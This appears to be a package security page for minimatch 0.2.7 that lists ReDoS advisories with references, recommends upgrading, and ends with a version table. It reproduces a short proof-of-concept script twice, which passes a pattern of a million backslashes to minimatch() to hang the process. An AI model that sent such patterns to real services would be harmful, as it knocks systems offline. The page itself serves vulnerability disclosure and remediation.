NodeJS/minimatch/0.2.7
a glob matcher in javascript
https://www.npmjs.com/package/minimatch
MIT
3 Security Vulnerabilities
minimatch ReDoS vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2022-3517
- https://github.com/grafana/grafana-image-renderer/issues/329
- https://github.com/isaacs/minimatch/commit/a8763f4388e51956be62dc6025cec1126beeb5e6
- https://github.com/nodejs/node/issues/42510
- https://github.com/advisories/GHSA-f8q6-p94x-37v3
- https://lists.debian.org/debian-lts-announce/2023/01/msg00011.html
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MTEUUTNIEBHGKUKKLNUZSV7IEP6IP3Q3/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UM6XJ73Q3NAM5KSGCOKJ2ZIA6GUWUJLK/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MTEUUTNIEBHGKUKKLNUZSV7IEP6IP3Q3
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UM6XJ73Q3NAM5KSGCOKJ2ZIA6GUWUJLK
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch
are vulnerable to regular expression denial of service attacks when user input is passed into the pattern
argument of minimatch(path, pattern)
.
Proof of Concept
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Recommendation
Update to version 3.0.2 or later.
Regular Expression Denial of Service
Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp
objects. The primary function, minimatch(path, pattern)
is vulnerable to ReDoS in the pattern
parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,
. The problematic portion of the regex is ((?:\\{2})*)
which matches against \\
.
A proof of concept is as follows: ``` var minimatch = require(“minimatch”);
// utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; }
var exploit = “[!” + genstr(1000000, “\”) + “A”;
// minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ```
107 Other Versions
Version | License | Security | Released | |
---|---|---|---|---|
9.0.4 | ISC | 2024-03-28 - 19:42 | about 2 months | |
9.0.3 | ISC | 2023-07-06 - 17:05 | 11 months | |
9.0.2 | ISC | 2023-06-23 - 21:12 | 11 months | |
9.0.1 | ISC | 2023-05-20 - 20:53 | 12 months | |
9.0.0 | ISC | 2023-04-09 - 22:15 | about 1 year | |
8.0.4 | ISC | 2023-04-09 - 20:17 | about 1 year | |
8.0.3 | ISC | 2023-04-03 - 16:51 | about 1 year | |
8.0.2 | ISC | 2023-04-02 - 03:41 | about 1 year | |
8.0.1 | ISC | 2023-04-02 - 03:39 | about 1 year | |
8.0.0 | ISC | 2023-04-02 - 03:33 | about 1 year | |
7.4.6 | ISC | 2023-04-09 - 20:18 | about 1 year | |
7.4.5 | ISC | 2023-04-03 - 16:49 | about 1 year | |
7.4.4 | ISC | 2023-04-01 - 23:44 | about 1 year | |
7.4.3 | ISC | 2023-03-22 - 18:52 | about 1 year | |
7.4.2 | ISC | 2023-03-01 - 20:13 | about 1 year | |
7.4.1 | ISC | 2023-03-01 - 07:59 | about 1 year | |
7.4.0 | ISC | 2023-03-01 - 06:59 | about 1 year | |
7.3.0 | ISC | 2023-02-27 - 19:58 | about 1 year | |
7.2.0 | ISC | 2023-02-26 - 09:13 | about 1 year | |
7.1.4 | ISC | 2023-02-26 - 01:03 | about 1 year | |
7.1.3 | ISC | 2023-02-25 - 02:07 | about 1 year | |
7.1.2 | ISC | 2023-02-24 - 22:56 | about 1 year | |
7.1.1 | ISC | 2023-02-24 - 00:36 | about 1 year | |
7.1.0 | ISC | 2023-02-22 - 23:45 | about 1 year | |
7.0.1 | ISC | 2023-02-22 - 02:01 | about 1 year | |
7.0.0 | ISC | 2023-02-20 - 00:45 | about 1 year | |
6.2.0 | ISC | 2023-02-13 - 08:58 | over 1 year | |
6.1.10 | ISC | 2023-02-13 - 08:20 | over 1 year | |
6.1.9 | ISC | 2023-02-13 - 06:54 | over 1 year | |
6.1.8 | ISC | 2023-02-11 - 21:10 | over 1 year | |
6.1.7 | ISC | 2023-02-11 - 20:33 | over 1 year | |
6.1.6 | ISC | 2023-01-22 - 17:52 | over 1 year | |
6.1.5 | ISC | 2023-01-17 - 22:17 | over 1 year | |
6.1.4 | ISC | 2023-01-17 - 17:46 | over 1 year | |
6.1.3 | ISC | 2023-01-17 - 17:24 | over 1 year | |
6.1.2 | ISC | 2023-01-17 - 15:02 | over 1 year | |
6.1.1 | ISC | 2023-01-17 - 14:57 | over 1 year | |
6.1.0 | ISC | 2023-01-17 - 07:11 | over 1 year | |
6.0.4 | ISC | 2023-01-16 - 01:55 | over 1 year | |
6.0.3 | ISC | 2023-01-15 - 23:08 | over 1 year | |
6.0.2 | ISC | 2023-01-15 - 21:26 | over 1 year | |
6.0.1 | ISC | 2023-01-15 - 17:37 | over 1 year | |
6.0.0 | ISC | 2023-01-14 - 21:07 | over 1 year | |
5.1.6 | ISC | 2023-01-17 - 19:46 | over 1 year | |
5.1.5 | ISC | 2023-01-17 - 15:04 | over 1 year | |
5.1.4 | ISC | 2023-01-14 - 19:09 | over 1 year | |
5.1.3 | ISC | 2023-01-14 - 18:54 | over 1 year | |
5.1.2 | ISC | 2022-12-20 - 15:12 | over 1 year | |
5.1.1 | ISC | 2022-11-29 - 20:33 | over 1 year | |
5.1.0 | ISC | 2022-05-16 - 16:13 | about 2 years | |
5.0.1 | ISC | 2022-02-24 - 17:58 | about 2 years | |
5.0.0 | ISC | 2022-02-15 - 16:50 | over 2 years | |
4.2.3 | ISC | 2023-01-17 - 19:47 | over 1 year | |
4.2.2 | ISC | 2023-01-17 - 15:09 | over 1 year | |
4.2.1 | ISC | 2022-02-15 - 16:35 | over 2 years | |
4.2.0 | ISC | 2022-02-15 - 16:03 | over 2 years | |
4.1.1 | ISC | 2022-02-13 - 04:22 | over 2 years | |
4.1.0 | ISC | 2022-02-13 - 00:58 | over 2 years | |
4.0.0 | ISC | 2022-02-13 - 00:37 | over 2 years | |
3.1.2 | ISC | 2022-02-15 - 20:32 | over 2 years | |
3.1.1 | ISC | 2022-02-13 - 04:01 | over 2 years | |
3.1.0 | ISC | 2022-02-13 - 01:03 | over 2 years | |
3.0.8 | ISC | 2022-02-15 - 20:33 | over 2 years | |
3.0.7 | ISC | 2022-02-13 - 04:03 | over 2 years | |
3.0.6 | ISC | 2022-02-12 - 23:58 | over 2 years | |
3.0.5 | ISC | 2022-02-06 - 20:28 | over 2 years | |
3.0.4 | ISC | 1 | 2017-05-07 - 18:11 | about 7 years |
3.0.3 | ISC | 1 | 2016-08-08 - 17:45 | almost 8 years |
3.0.2 | ISC | 1 | 2016-06-17 - 20:13 | almost 8 years |
3.0.0 | ISC | 3 | 2015-09-27 - 18:18 | over 8 years |
2.0.10 | ISC | 3 | 2015-07-23 - 01:51 | almost 9 years |
2.0.9 | ISC | 3 | 2015-07-18 - 23:03 | almost 9 years |
2.0.8 | ISC | 3 | 2015-05-19 - 01:38 | about 9 years |
2.0.7 | MIT | 3 | 2015-04-29 - 15:43 | about 9 years |
2.0.6 | MIT | 3 | 2015-04-29 - 15:25 | about 9 years |
2.0.5 | MIT | 3 | 2015-04-29 - 14:37 | about 9 years |
2.0.4 | MIT | 3 | 2015-03-12 - 17:34 | about 9 years |
2.0.3 | MIT | 3 | 2015-03-10 - 02:03 | about 9 years |
2.0.2 | MIT | 3 | 2015-03-10 - 00:34 | about 9 years |
2.0.1 | MIT | 3 | 2014-12-01 - 16:30 | over 9 years |
2.0.0 | MIT | 3 | 2014-12-01 - 02:12 | over 9 years |
1.0.0 | MIT | 3 | 2014-07-28 - 21:29 | almost 10 years |
0.4.0 | MIT | 3 | 2014-07-11 - 23:25 | almost 10 years |
0.3.0 | MIT | 3 | 2014-05-13 - 00:47 | about 10 years |
0.2.14 | MIT | 3 | 2013-12-16 - 22:01 | over 10 years |
0.2.13 | MIT | 3 | 2013-12-16 - 06:02 | over 10 years |
0.2.12 | MIT | 3 | 2013-04-12 - 19:28 | about 11 years |
0.2.11 | MIT | 3 | 2013-02-25 - 16:23 | about 11 years |
0.2.10 | MIT | 3 | 2013-02-25 - 16:21 | about 11 years |
0.2.9 | MIT | 3 | 2012-10-25 - 15:34 | over 11 years |
0.2.8 | MIT | 3 | 2012-10-25 - 15:24 | over 11 years |
0.2.7 | MIT | 3 | 2012-10-04 - 03:49 | over 11 years |
0.2.6 | MIT | 3 | 2012-08-13 - 16:42 | almost 12 years |
0.2.5 | MIT | 3 | 2012-06-04 - 20:57 | almost 12 years |
0.2.4 | MIT | 3 | 2012-03-29 - 01:48 | about 12 years |
0.2.3 | MIT | 3 | 2012-03-29 - 01:37 | about 12 years |
0.2.2 | MIT | 3 | 2012-03-22 - 05:22 | about 12 years |
0.2.0 | MIT | 3 | 2012-02-22 - 11:04 | about 12 years |
0.1.5 | MIT | 3 | 2012-02-04 - 19:32 | over 12 years |
0.1.4 | MIT | 3 | 2012-01-19 - 00:14 | over 12 years |